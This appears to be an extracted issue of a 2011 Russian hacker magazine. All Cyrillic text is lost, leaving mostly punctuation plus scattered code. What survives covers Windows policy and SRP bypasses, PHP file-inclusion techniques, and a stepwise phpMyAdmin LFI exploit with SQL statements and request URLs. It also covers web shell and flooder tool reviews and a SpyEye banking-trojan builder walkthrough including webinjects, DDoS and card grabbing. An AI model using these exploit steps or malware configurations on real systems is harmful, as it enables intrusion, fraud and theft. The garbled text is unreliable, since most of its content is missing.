Cookie: mmbsid=b8HMuKD6KEILm9GTm5Z0eOMnBLtFy6Xp
...

10 /153/ 2011

{"t":"0000000000000","a":"00000000","s":1,"e":0,"d":[],"r":
"http%3A%2F%2Fmamba.ru%2Ftips%2F%3Ftip%3DLogin","XForms":0}
,
"r":"http%3A%2F%2Fmamba.ru%2Ftips%2F%3Ftip%3DLogin",
. ,
, .
, .


1000
, ,
. -
, . ,
:
{"t":"1311437340338","a":0,"s":1,"e":0,"d":[],"r":0,"XForms":0,"
captcha":1}
, IP-,
. ( ), IP-
cURL:
curl_setopt($curl, CURLOPT_PROXY, '12.34.56.78:80');
,
, ,
.

,
-
. , ,
, , ][-

, , ,
.
, ! z

065

GreenDog, DSecRG.ru, Digital Security (agrrrdog@gmail.com)

, Microsoft,

Windows, . , ,
, .

,
.
. - .
, .
,
, -, , -,
, .
.
.

?
, ( Group
Policy)
.
,
, . , .
,
, , ( Software
Restriction Policies). ?
. , ,

, . , , ,
. .
. , .
,
gpedit.msc (secpol.msc).
. , .

1.
, ?
:
1. .
2. - .
3.
.
4. ,
.

066

10 /153/ 2011

Win+U + Help + Jump to url = Explorer

, :
. .
5 .
, !
,
:
1. - .
2. .
3. - .

. .
,
(, ).

,
(
). .
, - ,
.
, . , , .

2. ?
, , ,
, .
, .
, , , .

( ):
:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Policies\
HKEY_LOCAL_MACHINE\Software\Policies\
:
HKEY_CURENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\
HKEY_CURENT_USER\Software\Policies\
- , (
userspace) (
advapi.dll) ,
/ .
, - ,
. ? , .
, .
! : -
,

10 /153/ 2011

3. SRP
,
SRP (Software Restriction Policies). ,
,
, . Blacklist Whitelist
,
: ( ), . ,
SRP,
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\
Windows\Safer\CodeIdentifiers\TransparentEnabled 0, , ,
. , ,
. (goo.gl/KNauh)
2005 SRP
GPdisable. DLL- , DLL.
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\
Windows\Safer\CodeIdentifiers\TransparentEnabled, SRP,
STATUS_OBJECT_NAME_NOT_FOUND. , , SRP .
Sysinternals GPdisable
( -
(bit.ly/nnzjN9). .
GPCul8or (bit.ly/nJAYri) Erica Rachnera , . ?
GPCul8or
(DisableTaskMgr, ProxySettingsPerUser )
. ,
. RegMon , ,
Policies.

(goo.gl/LE1M0). bpmtk (Basic Process
Manipulation Tool Kit),
.

4. BINARY PLANTING
GPdisable :
gpdisable.exe DLL ;
gpdisable.dll DLL SRP.
, ,
SRP ( GPdisable, bpmtk,

067

SRP

GPCul8or ).
.
DLL ( gpdisable.dll). .
DLL,
,
. !
Across
Security (bit.ly/ov7EAz), (
, ) .
Binary planting (
dll hijacking), :
?.
(
Word), , DLL SRP. , dll hijacking
Across GPdisable:



, Citrix XenApp.
? XenApp, , ( ). ,
- , .
. Citrix-
. -
. ,
Citrix-.
, ( ),
.
, , , (
, ). ,
,
, . , -
. ( , ),
: Citrix-
<Ctrl+Shift+Esc> Citrix-,
,
. Citrix.

068

Runas

1. gpdisable.dll ehTrace.dll.
2. .{2E095DD0-AF56-47E4-A099EAC038DECC24} ( , ).
3. ehTrace.dll .
4. Word, Excel ,
, PDF.
5. .
6. .
DLL!
8. , .

5.
,
, :
, SYSTEM;
;
Microsoft Office;
,
(Common Language Runtime).
, SYSTEM . :
- , ,
. , Win+U
( ). Utilman.exe ( ) SYSTEM.
. ,
c SYSTEM.
( Vista), Jump to url, C:\ explorer. ,
(View Source) ,
. ,
.

Microsoft Office. . . (
SRP), , , ,
. - exe.
:
Sub GOSHELL()
Shell "C:\windows\system32\regedit.exe", vbNormalFocus
End Sub

10 /153/ 2011

, , exe.
(goo.gl/kSPK3). MS Excel VirtualAlloc,
WriteProcessMemory CreateThread,
. DLL
, DLL , cmd.exe. ,
ReactOS. , SRP
DLL ( ),
,
LoadLibraryEx LOAD_IGNORE_CODE_AUTHZ_LEVEL
LoadLibrary, dll
white- !

6.
, ,
.
. ,
SRP.
. , , . , , ,
%TEMP% exe,
:
Set TEMP C:\
C:.
, ,
exe-:

, .
C:\windows\
system32\spool\Printers C:\windows\temp.
- , , , SRP . ,
, ,
AccessChk (goo.gl/jQ9tt).

7.
,
. ,
, . :
1. <Shift> + ,
Run as.
2. : runas /noprofile <
exe->.
, ,
, . ! . .
test_gpo3 regedit -
. , test_gpo2 exe (
),
regedit. ,
( RDP, ), ,
(
bit.ly/pXsBj6).

8. HTA
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\SystemRoot%
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\SystemRoot%*.exe
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\SystemRoot%System32\*.exe
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\ProgramFilesDir%
Windows Program
Files .

,
. c , SRP-. ,

(goo.gl/BmBsm) HTA (HTML Application).
, :
1. :
<HTML>
<script language="vbscript">
msgbox "I'm dangerous VB Code!!!"
</script>
</HTML>
2. .hta (, execute_this.hta).
3. .
4. hta .
, MessageBox
VB- ? SRP , ,
. -
. HTA REG, MSC, HTA, CHM.
com= (
, ). ,
DOS.

10 /153/ 2011

, . . , ,
.

.

, . z

069

Pr0xor Kotov (https://rdot.org/forum/)

LOCAL/
REMOTE FILE
INCLUDE

,

LFI/RFI PHP-

include(_once) require(_once).

PHP-
, ,

.
070

LINKS
www.php.net/
set_include_path

set_include_path();
www.php.net/
unserialize

unserialize();
www.php.net/
virtual
virtual();
www.php.net/__
autoload
__autoload;
bit.ly/nWyefG
rdot.
org,

__autoload ;
bit.ly/pdY5zS

spl_autoload();
www.phpmyadmin.
net
phpMyAdmin;
bit.ly/nV1niG
LFI-
phpMyAdmin.

SET_INCLUDE_PATH()
, , set_
include_path(),
include_path
include(_once)/require(_once). , PHP-
,
include_path, .
,
set_include_path ( ini_set('include_path', []),
, include.
PHP-,
:
set_include_path($path . PATH_SEPARATOR . get_include_path());
include "myclass.php";

DVD




.

,
$path. , , , - ,
. ,
. ,
myclass.php .

10 /153/ 2011

, set_include_path(), ,
,
file manipulation (
), :
1. /tmp myclass.php (
777).
2. $path = /tmp/.
3. , , myclass.php /tmp.
, , ,
,
.
:
PHP-, ,
- PHP
- ,
www/nobody/apache. file
manipulation,
, ,
PHP.


, include(_once)/require(_once),
.
, PHP >= 5.1.2
__autoload,
include .
,
PHP:
If the class name is used e.g. in call_user_func()
then it can contain some dangerous characters such as ../.
It is recommended to not use the user-input in such functions
or at least verify the input in __autoload().
,
, , LFI/RFI. ,
/etc/passwd:
function __autoload($class_name) {
require_once $class_name . '.php';
}
call_user_func(array("../../../etc/passwd\0","test"));
, call_user_func() ,
.
unserialize(),
,
call_user_func().
.
, ,
- ../../../etc/
passwd.
, .

set_include_path() + __autoload()
set_include_
path(),
.
, - __
autoload, set_include_path() unserialize():

10 /153/ 2011

- spl_autoload() 80vul.com

function __autoload($class_name)
{
include $class_name;
}
...
set_include_path($path.PATH_SEPARATOR . get_include_path());
...
$cookie = unserialize($_COOKIE['auth']);
,
$path. , $path /etc/
auth O:7:"hosts":0:{},
/etc/hosts. PHP, rdot.org ( ). __autoload,
SPL-,
spl_autoload, , 2009 .
80vul.com:
<?php spl_autoload('info', '.txt'); ?>
info.txt.

VIRTUAL
PHP-, ,
virtual().
, <!--#include
virtual...--> mod_include, Apache. CGI, shtml- ,
Apache. PHP- .
:
<?php virtual('info.php'); ?>

info.php.

GOOGLE CODESEARCH

google.com/codesearch, lang:^php$
: set_
include_path(), __autoload, spl_autoload(), virtual() unserialize().

071


$this->error_config_file = false;
$this->source_mtime = filemtime($this->getSource());
}

( PHP)
-.
,
phpMyAdmin was
unable to read your configuration file! Parse error,
include.

PHPMYADMIN

LFI phpMyAdmin sql.php

, virtual spl_autoload
, callback.
, virtual :
<?php
$path = 'virtual';
$path('myclass.php');
?>
... call_user_func():
<?
call_user_func('virtual', 'myclass.php');
?>

EVAL == EVIL
,
, eval('?>' . trim(file_get_contents('info.txt'))).
, , include/require, .
-, ,

. -, file_get_contents()
eval() allow_url_include, ,
allow_url_fopen = On (
), .
,
phpMyAdmin <=
2.11.9 unserialize() arbitrary PHP code execution exploit (bit.ly/qW94f9).
phpMyAdmin

unserialize(), load
PMA_Config .
load:

, ,

phpMyAdmin. , phpMyAdmin
, ][
. , , , , ,
.
, ./
libraries/display_tbl.lib.php. phpMyAdmin
3.3.10.1 3.4.3 .

Security (PMASA-2011-8).

:
advisory, , 3.3. (
,
).
:
./libraries/display_tbl.lib.php (phpMyAdmin 3.3.10)
if ($GLOBALS['cfgRelation']['mimework']
&& $GLOBALS['cfg']['BrowseMIME']) {
if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) ... ) {
...
-$include_file = $GLOBALS['mime_map'][$meta->name]
['transformation'];
+$include_file = PMA_securePath($GLOBALS['mime_map'][$meta->name]
['transformation']);

$eval_result =
eval('?>' . trim(implode("\n", file($this->getSource()))));
...
if ($eval_result === false)
$this->error_config_file = true;
else
{

072

__autoload php.net

10 /153/ 2011

phpMyAdmin

...
require_once './libraries/transformations/' . $include_file;
,
:
1. $GLOBALS['cfg']['BrowseMIME'] == true. , , ./libraries/config.
default.php
true. .
config.default.php, .
2. $GLOBALS['cfgRelation']
$GLOBALS['mime_map']. $cfgRelation
, ,
, .
, PMA_getRelationsParam(),
, , ./libraries/relation.
lib.php:
function PMA_getRelationsParam($verbose = false)
{
if(empty($_SESSION['relation'][$GLOBALS['server']]))
{
$_SESSION['relation'][$GLOBALS['server']] =
PMA__getRelationsParam();
}
$GLOBALS['cfgRelation'] = $_SESSION['relation'[$GLOBALS['server']];
...
return $_SESSION['relation'][$GLOBALS['server']];
}
$_SESSION relation[$GLOBALS
['server']], PMA__
getRelationsParam. ,
. PMA__getRelationsParam
$cfgRelation,
$cfg['Servers'][$i]['pmadb'].
,
$cfgRelation false null.
$cfg['Servers'][$i]['pmadb']
, $cfgRelation . ,
$GLOBALS['cfgRelation']
,

10 /153/ 2011

$_SESSION phpmyadmin (
-,
$cfg['Servers'][$i]['pmadb']).
,
$_SESSION parse_str(), Mango,
phpMyAdmin,
. $cfgRelation .
, ,
$GLOBALS['server']. ,
. phpMyAdmin
, 1.
, , ,
, phpMyAdmin':
'pmaUser-' . $GLOBALS['server'] 'pmaPass-' . $GLOBALS['server'].
.
$GLOBALS['mime_map'] PMA_
getMIME():
./libraries/transformations.lib.php
function PMA_getMIME($db, $table, $strict = false)
{
...
$com_qry = '
SELECT `column_name`,
`mimetype`,
`transformation`,
`transformation_options`
FROM ' . PMA_backquote($cfgRelation['db']) .
'.' . PMA_backquote($cfgRelation['column_info']) . '
WHERE `db_name` = \'' . PMA_sqlAddslashes($db) . '\'
AND `table_name` = \'' . PMA_sqlAddslashes($table) . '\'
AND ( `mimetype` != \'\'' . (!$strict ? '
OR `transformation` != \'\'
OR `transformation_options` != \'\'' : '') . ')';
return PMA_DBI_fetch_result($com_qry, 'column_name',
null, $GLOBALS['controllink']);
}
, $GLOBALS['mime_map']
,
. , . ,
PMA_displayTableBody.

073


, table_name .

PMA_getMIME $GLOBALS['mime_map'].
2. $_SESSION['relation'] $cfgRelation.
.
PMA,
:
http://phpMyAdmin/index.php?token=< >
&session_to_unset=<*x*>&_SESSION[relation][1][commwork]=1
&_SESSION[relation][1][mimework]=1&_SESSION[relation][1]
[db]=test&_SESSION[relation][1][column_info]=pmatest

.
3. , http://
phpMyAdmin/sql.php?db=test&table=integer&token=< >.
, integer a /etc/hosts.
__autoload

, sql.php:
//
require_once './libraries/display_tbl.lib.php';
...
// , $cfgRelation
if (strlen($db)) {
require_once './libraries/relation.lib.php';
$cfgRelation = PMA_getRelationsParam();
}
...
PMA_displayTable($result, $disp_mode, $analyzed_sql);
PMA_displayTable ./libraries/display_
tbl.lib.php, , ,
PMA_displayTableHeaders, $GLOBALS['mime_map'].

:
,
:
1. phpMyAdmin .
, sql.php :
CREATE TABLE 'test'.'integer' ( '1' INT NOT NULL ) ENGINE = MYISAM ;
INSERT INTO 'test'.'integer' ( '1' ) VALUES ( '1' );

$GLOBALS['mime_map']:
CREATE TABLE 'test'.'pmatest' ( 'column_name' INT NOT NULL ,
'mimetype' INT NOT NULL , 'transformation' TEXT NOT NULL ,
'transformation_options' INT NOT NULL , 'db_name' TEXT NOT NULL,
'table_name' TEXT NOT NULL ) ENGINE = MYISAM ;
INSERT INTO 'test'.'pmatest' ('column_name', 'mimetype',
'transformation', 'transformation_options', 'db_name',
'table_name') VALUES ('1', '1', '../../../../../../../../etc/hosts',
'1', 'test', 'integer');
transformation
, db_name ,

074


, ,
3.4.x- phpMyAdmin 3.4.3.1
.
advisory PMASA-2011-10. , , ,
sql.php:
$mime_map = PMA_getMIME($db, $table);
...
foreach($mime_map as $transformation) {
$include_file = $transformation['transformation'];
...
if (file_exists('./libraries/transformations/' . $include_file)) {
$transformfunction_name = str_replace('.inc.php', '',
$transformation['transformation']);
...
require_once './libraries/transformations/' . $include_file;
,
:
1. $GLOBALS['is_ajax_request'] == true . ,
ajax_request.
2. 0 == $num_rows || $is_affected. : ,
- sql-. ,
(
).
, ,
PMA_getMIME $mime_map
phpmyadmin $_SESSION.
phpmyadmin phpMyAdmin 3.4.3.1,

.
,
phpMyAdmin 3.4.3:
1. phpMyAdmin :
CREATE TABLE 'test'.'pmatest' ( 'column_name' INT NOT NULL ,
'mimetype' INT NOT NULL , 'transformation' TEXT NOT NULL ,
'transformation_options' INT NOT NULL , 'db_name' TEXT NOT NULL,
'table_name' TEXT NOT NULL ) ENGINE = MYISAM ;

10 /153/ 2011

LFI- phpMyAdmin

INSERT INTO 'test'.'pmatest' ('column_name', 'mimetype',


'transformation', 'transformation_options', 'db_name',
'table_name') VALUES ('1', '1', '/../../../../../../../etc/hosts',
'1', 'test', '< , >');
2.
$cfgRelation:
http://phpMyAdmin/index.php?token=< >
&session_to_unset=<*x*>&_SESSION[relation][1][commwork]=1
&_SESSION[relation][1][mimework]=1&_SESSION[relation][1][db]=test
&_SESSION[relation][1][column_info]=pmatest
3. :
http://phpmyadmin/sql.php?do_transformations=1&ajax_request=1
&table=< >&db=test&token=< >
, , ,
$cfgRelation.
,

10 /153/ 2011

phpMyAdmin shared-. :
, ,

MySQL phpMyAdmin.


, . , ,
, / ,
. ,
PHP,

.
,
, phpMyAdmin, . ,
.
, .
, ,
, . z

075

/ X-TOOLS

(icq 884888, http://snipper.ru)

X-Tools

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

:
*nix/win

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

:
profexer

:
c0n Difesa

:
Zdez Bil Ya

DEFBRUTE

PHP-- P.A.S.

ICQ SMS-

defbc.exe <server ip> <server port>


-. . : P.A.S. (php web-shell)
rdot.org profexer.
,
:
1. .
2.
: bit.ly/r36L3k
.
1.
3. , , ,
.
4. SQL- MySQL, MSSQL, PostgreSQL,
.
5. Bind port (Perl).
6. Back-connect (Perl).
7. Port scanner (PHP).
8. BruteForce /etc/passwd SSH,
FTP, POP3, MySQL, MSSQL, PostgreSQL
.
9. PHP-
.
10. (15 ).

www.defec.ru/node/4
.

,
:
.

Zdez Bil Ya.


, ICQ sms flooder ,
ICQ. :
,
;
ICQ 5 ;
(** ,
icq) **;
;
( ).
,
, 160
() 70 (, ).

.
, ICQ,
sms,
.
.
ICQ sms
check SMS.
:
, ,

,
.


MD5-.

, . ,

- ?

. .
,

,
.
, DefBrute
MD5-.
.
(DefBrute v1.0.exe)
, . DefBrute ,
:

076

10 /153/ 2011

X-Tools

:
Android

FACENIFF:

:
bponury

FaceNiff
Firesheep,
HTTP-
.
Firesheep Firefox,
Facebook, Twitter,
Flickr Amazon.com ,
.

, .
FaceNiff
Firesheep
! -, apk- (faceniff.ponury.net),

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7

:
SLESH

:
Flame of Soul

:
xmadstyle

MICSPY SE
, X-Tools

MicSpy .

MicSpy SE
(Stream Edition).
,
, , .

:
;
;
:
UPX
- 5632 ;

;

WinAmp;

256 .
, : ,

http://[IP ]:4545.
back
connect' .

10 /153/ 2011

Android-
-
: FaceBook, Twitter,
. . 10. , ,

( : bit.ly/qbzwGh). ,
,

.
FaceNiff Android
-. , (WEP,
WPA WPA2).
EAP.

EMAIL- XSPRYT

MD5
ONLINE SCANNER


XSpryt.

email-
, , .
, !
:
;
-;
;
( );
;
;

.
:
1. exe-.
2. ,
.

: grabber.exe -h
winne.com -p 80 -t 3000. :
h ( http://);
p ;
t - .
mail.
txt; ,
, link.txt.

MD5 MD5 Online Scanner,


xmadstyle -.
,
MD5- -.
:
( 250 );

;
-
;

;

;
GUI, .
, : c0llision.net, tmto.org, www.md5this.
com, md5.hashcracking.com, md5online.net,
hashkiller.com 30 .
,
:
[MD5] ;
[DATA] (, . .);
[TEXT] ();
[SERVICE] , .

077

MALWARE

SPYEYE



SpyEye.
,
, . , SpyEye
, .

INFO
SpyEye
v1.3.25
14.03.2011.


,
,
,

.

078


:
.
DDoS, ,
. SpyEye
, . SpyEye ,
.


SpyEye (,
, , ). , .
,
. - ,
.
10 %.
. SpyEye .
,
. /
, -
.
.
SpyEye GNU/Linux Debian 5.0.
-
, ssh- .
VirtualBox.

, . - PHP,
MySQL-.
. .
gate.php.

10 /153/ 2011

BackConnect Server (for SOCKS5 & FTP).


SOCKS5 FTP,
BackConnect- GNU/Linux.
Collector.
GNU/Linux, .
, ,
TCP Sausages.
LZO-.

MySQL. ,
GNU/Linux MySQL. ,
SSH- .
RDP BackConnect Server.
OS GNU/Linux.

MySQL.


1. Formgrabber CP (Collectors GUI). ,
PHP, .
,
. .
2. Builder. ,
exe- . :
Encryption key , config.bin.
.
Clear cookies every startup ,
( ) cookies IE FF.
FF , cookies ,
FF cookies cookies.sqlite.
Delete non-exportable certificates
Windows ( IE)
. , ,
, *.pfx, .
SpyEye .
,
.
, .
Dont send http-reports HTTP- . , HTTPS-
( HTTP- Basic-).
Compress build by UPX ,
UPX.
, .
Make build without ZLIB support HTTP 1.0 FF-
Accept-Encoding, -
( gzip, deflate).
SpyEye zlib,
. zlib.
1516 K (
UPX ). ,
FF, .
Make LITE-config ,
config.bin , webinjects, screenshots
( customconnector.dll). ,
config.bin .
, .


.

10 /153/ 2011

.
EXE name ( ).
Mutex name mutex,
.
Anti-Rapport , Rapport Trusteer. ,
SpyEye Rapport . ,
. ,
, Rapport,
Zeus . RKU,
,
Anti-Rapport.
Screenshots.
screenshots. .
. .
,
, .
:

%URL_MASK% %WIDTH% %HEIGHT% %MINIMUM_CLICKS%


%MINIMUM_SECONDS%
URL_MASK URL. URL , ,
.
, .
,
(,
). : -

FTP

079

MALWARE

, Hooked Function:
GRABBED DATA. . .)
H L ,
data_before data_after.

data_before, data_inject, data_after


:
1. data_before
data_after , ...
data_inject data_before.
2. data_after
data_before , ...
data_inject data_after.
3. data_before data_after,
... data_before
data_after data_inject.


( ,
HTTP-, URL_MASK)
.
Client : Builder : webinjects. webinjects.
HTTP/HTTPS-.
, Zeus. set_url. ,
Zeus.
: set_url, data_before,
data_inject, data_after ( data_end , data_):
set_url
, . Zeus,
, * #.
(
G):
G ,
, GET.
P ,
, POST.
L data_before data_after
.
data_inject. (


- BOA HTTP 1.0 (
HTTP SpyEye
Mozilla Firefox). (*.css, *.js)
- , ContentEncoding , .
, ,
Invalid Content, .
-, SpyEye,
( data_before, data_inject data_after)
css- js-.
Builder: serial.txt.
,
. : !
Client : Builder : collectors.txt.
collectors.txt. , (
Enter):
ip:port IP, SpyEye Collector
PORT,
. IP . ,
, - , (80 443),

.

, , (
0,1 ).
,

.

SPYEYE
ZEUS
data_before, data_inject, data_after SpyEye
, Zeus . Zeus
CSS- JS-. ,
SpyEye, , set_url .css .js ( ).
SpyEye H Zeus
HTML- HTTP-. SpyEye #
* ( set_url). Zeus #
.

080


. .
Client : Plugins : webfakes. webfakes HTTP- HTTPS-
- IE
FF.
, Zeus,
:
entry "WebFakes"
%URL_MASK% %URL_REDIRECT% %FLAGS% %POST_BLACK_MASK%
%POST_WHITE_MASK% %BLOCK_URL% %WEBFAKE_NAME%
%UNBLOCK_URL%
End

10 /153/ 2011

FF .
API nspr4, POST-,
,
4 .
POST-,
4 HTTP- ( HTTP).
.
DDoS. , DDoS- - .
:
type target port time.
type target port time.
type DDoS. :
slowloris/ssyn/udp.
target IP ,
.
port , DDoS ( UPD DDoS
0, ).
time , DDoS ( UDP/SSYN ,
Slowloris ).
DDoS (
, ). DDoS Slowloris
( 80-).
.
Client : Plugins : ccgrabber.
, POST-
.
Luhn algorithm.
, POST- .
CC
.
ffcertgrabber. SpyEye
Windows. Firefox
.
FF.
, .
( ).
FF.
Socks5 BackConnect. SOCKS5-
BackConnect. ,
Socks.

10 /153/ 2011

FTP BackConnect. FTP-


BackConnect-.
, FTP-.
RDP BackConnect. RDP-
BackConnect-. ,
RDP.

(
). Portable- TotalCommander,

( ).
.
.

(RDP).
Windows mstsc.exe Remote Desktop Connection.
:
x64-;
;
Win7 Starter ( Starter);
, !


, ,
.
.
, ,
.
, ,
. SpyEye ,
,
. SpyEye

. ,
, . z

081

MALWARE

A.I.

,


. ,

,
. - , ,
. ,
:).

, ,

,
, , .
, Anonymous LulzSec,
, , , , ,
.
,
.
, ,
, , ,
.

082

10 /153/ 2011


2000- .
, ,
.
-
,
. -
, ,
.
,
(
)
. , -.
: ,
, . ,
, ,
.
, ,
,
.
, .
,
, , ,
, , , , , 1001
. ,
, 2010
. 60 .
Trojan-Spy.
, ,
,
.
? , ,
, ,
.
,
,
- .

, ,
.
, ,
.

, ,

.


, ,
, . ,
,
, .
,
.

: , , . ,
- SpyEye Zeus,
,
,
,
-,
. . ,
. Zeus, SpyEye

.

, .
,

!
?

-
,
-

10 /153/ 2011

083

MALWARE

SpyEye
,


Google

,
.
,
, . ,
-, , -
.
:
, . , .
- ,
- .
- ,
. -

, . ,
, , ,
, ,
, .
. DdoS, , ,
- . .

. .
,
.
, ,
-
,
0day- Windows.
, , , , ,

(.
).
, , .
.
: , . ,
: .
, : ,
. ,
,
, ,
(,
, ?). . 10
% .
,
, , .
, ,
, (. ), FTP ( ).

, , ,

, ?!

084

10 /153/ 2011

Exp

, . , ,
, ,
. , , Zeus,
, , . !
(
) - 1000 .
, : , ,
,
.
,
, . .
, , .
,
, ,
100
. , , ,
.
,
,
, ,
, .

,
, ,
,

,
,
. ,
, , - .
() .
500 . , .
, , .
(
) - -
( -), . , . , ,
. -, ,
. ,
, ,
. 13001500 .
,
, ,
- . , ,

.
:
, ,
, (, ,
,
. . .).
, 500 .
, 800. ,
,
, ,


?
,

HOW TO NOT TO DO
, , .
( )
, :
, .
:
, . ,
:
. , :
. , ,
, .
,
. .

. : , , .

10 /153/ 2011

085

MALWARE

,
,

086

, ,
.
, , ,
, ,
. !
. , ,
,
. 200 ,
, , .
,
, - .
.

. -,
:
. :
? ,
: . .
,
, : 1000
? !.
,
.
- , , . ,
,
.
,
: , ! ,
! ! ? ?! ! , ! !
, ,
.
, , .
:
, . , ?!

, .
. 1015 % . ?

Western Union (, ,
)
-
. ,
,
.
?
. ,
,
60007000 . , 1000 ,
, , . , .
, 1015 % ,
500 000 . 7000?
, . , , ,
, ,
, ,
- .


, ,
,
. ,
27
. ? ,
.
,
, .
, ,
.
:
,
, ,
, ,
( , ,
. . .).

- , .
- :
,
. z

10 /153/ 2011

-
?

- : , ,

.

,
/,
.

Black Hole
.
.


(TDS),

.

10 /153/ 2011

-

.
Black Hole
Paunch
.


, , ,
, .
Black Hole
. $1500,
$ 1000 $ 700.

BlackHole Exploit Kit 1.0.2


,
thehackernews.
com. 2
ZeuS.


7
,
273 .

087

088

10 /153/
/
2011

Mifrill (mifrill@gameland.ru)

, , ,
.

,
. ! ,

.
,

, .
!

10 /153/ 2011


: Facebook ,
Amazon , Twitter
.
, ,
.
.
, ,
, , ,
. ,
, 90 100
, ,
.
. ,
.
,
.
, , ,
, Apple

. ,
.

,
,
,
? -,
,
,
? ,
,
,
, ?


. ,
,
.
. , ,
, ,
.
,
, ,
,

, .

089


Startup Weekend

SumIT

Startup Point

:
: russia.startupweekend.org
: ,
:

:
: sumit.ru
: -
:

: Startup Point
: startuppoint.ru
:
:

Startup Weekend, ,
.
,
,
-, ,
IT .
, . .
,
, . , 12-
-,
, - ,
$100 000
.
( 75 %
). .


2500 ,
250 , 100 , 120
. SumIT
. ,
. SumIT
Weekend, Startup
Marathon. ,

. -
,
IT-,
SumIT. Invest Fest, . Invest
Fest -
IT-: Runa Capital, Almaz, ABRT, , Mail.
ru Group, EMC, Intel, , RSV Venture Partners.

Startup Point

-
,
10 000 , 2500+
, 200+
. Startup Point $3
.
.
, ,
.
, , .
Elevator Pitch
(2- )
Success
Story.
. , ,
.


Almaz Capital Partners

Runa Capital

: almazcapital.com
:
: ~$100500

: runacap.com/ru
:
: $500

: company.yandex.ru/public/start/factory.xml
:
: $50100 .

Almaz Capital Partners



, 2008 .
(
Almaz Capital Partners Runa Park,
Runa Capital; 2010
; Russian
TechTour 2004). 2008 .
$125 , $60 Cisco UFG
Asset Management.
Appollo Project, Parallels .
Almaz Capital Partners
.

. 2010-
Qik ( ),
Skype 2011 $150 .


2010 .
Parallels Acronis


Almaz Capital Partners .
Runa Capital --
.
. Runa Capital
, , , . Runa Capital
20 . -,

. Runapark. Runa Capital
$1 (
).

., ,

,
-, ,
.


$50150 .
, ,
, ( , ),
, ,
,
, ,

.
,
.

090

10 /153/ 2011


, , , .
.

.
,
, , .

HackDay

Harvest

StartUp Week

: -
: hackday.ru
:
:

: GreenfieldProject
: greenfield-project.ru/harvest
:
:

: STARTeurope, Initial Factor,


: startupweek2011.com
: ,
: 3 7 2011 .


HackDay
.

2
. HackDay
Yahoo! 2005 .

-. .
, , .
, ,
- . ,
HackDay
. , HackDay , IT, , ,
, ,
.
.

Harvest
HackDay.

- .

,
. Harvest
, .
,

.
GreenfieldProject
-, ,
-.
,
.



, StartUp
Week Europe Festival

. ,

, ,
, , , .
. ,
StartUp Week 70
-,
.
: ,
EDventures Holdings, (
Skype), , last.fm,
( SeedCamp
- ),
, Almaz Partners, ,
ABR .


, .
,

, .

. .

Microsoft

ABRT Venture Fund

: ms-start.ru
:
: $30 $100 .

: glavstart.ru
:
: $100 .

: abrtfund.com/rus
:
: $1 5


2010
Microsoft .




-.
. ,

, , ..
,
.
150
,
.
$30
$100 . , $100 .
PiratePay,

.



,
.
, ,
Startup Weekend .
,
,
12
$100 . ,
,
. ,
,
Facebook .

Facebook
.



, Aelita Software,
,
2004 .
Quest Software $115 .
Aelita Software
. ABRT

.
, .
, ABRP ,

. (Mangrove
Capital Partners) (Insight Venture
Partners OpenView Venture Partners) , ,
$100 .
ABRT .

10 /153/ 2011

091


.
,
.
Facebook Google,

, .


:

? , -

,
, -
, ?

,
.
,
.
,
, ,

.
285- .
.
, .
,
Jelastic ,
Java-,
Java
(SaaS).
IT-, -,

. -, b2b-.
,
, ,
.
, , ,
.


, ,

-.
,
Runa Capital (runacap.com).



? , $50100,
? ?

, ,

?


, ,
,
,
.
-,

, .

,
.

092


?
,
? ,

, ?


social, local, mobile, ,
.

-,
.
.
,

Runa Capital $500 .


,
,
.
, , .


, .

,

.


.

10 /153/ 2011


Runa Capital .
:
Telefir (telefir.ru)
- .
, Twitter.

. , ,
.
, .
Jelastic (hivext.ru), PaaS-, Java-

.
, 3 % .
Metabar (metabar.ru)

.
,
, .
Travelmenu (travelmenu.ru)
Almaz Capital.
3
,
290 . , 100
500 .
, .
,
, ,
Alawar Qik.
Almaz Capital Skype
( $150 . . Mifrill).

IT
Q ?
, ?
, ,
?

,
,


? ,
,
, ,
.

, ,
,
Runa Capital . ,

: Parallels, Acronis,
Abby, Kaspersky. ,
.
Mail.ru Yandex
IPO .

Startup Weekend

10 /153/ 2011

Startup Point

.

,
, - .
,
, , ,
. , , .

. ,

STARTUP
WEEKEND, STARTUP POINT, SUMIT, HACK DAY
. .?
?

,
,


-.
,
, .

,
, , , ,
,
, ,
. , ,
, ,
...
: ? z

Startup Week

093

2007
.
2009
ESET
.
security: CONFidence,
CARO, PHD .

100% Virus Free Podcast.

094

10 /153/ 2011

Eset/Russia

VIRUS

FREE

ESET/RUSSIA

, ,
.
, ,
.
,
,
?

ESET.

10 /153/ 2011

MAN


? ,
,
? ?

, , .
-,
- 1998
.
580
( 8- 8080)
. ,

.
,
, ,

. ,
CD-ROM
13,
.
,
,

095

/
WinNuke, ,
, DoS
. , ,
, ,
.

, -
.
, , ,
,
.
,
Windows
.

. -
, ,
PoC perl.
,

. ,
,
,
,
,
, .
,
WinNuke, .



.
, ,
, . ,
, ,
JME,
Java.
,

, , ,
. Python,
,
. ,

, ,
++. , ++
,
Python.
, , ,
.


?
,
?

A
096


, ,

,
,
.
, , ,

. ,
- ,
, TLD3/4, Rovnix,
.

-,

.


?
-

?

,
, - ,
.
,

.
-,
,
PPI.

.

,

ESET LETA
GROUP, ESET?
ESET?

,
, ,
.

,
.

,

.

, : ,
, , -, -
. ,

.


?
,
?
ESET
?

, ,

NDA. ,
,
. , ,

: ,
.
, , , ,

, .

: ESET
?

?


, , ,
. ,
,

.
,
-
. , ,

,
.

?
-
?

,
:
Hex-Rays. ,
, , ,
,
,
. IDA
Pro

Hiew,
-
.
Immunity Debugger
Python API.
,
, WinDbg ( , ,
Python- pykd).
SofIce,

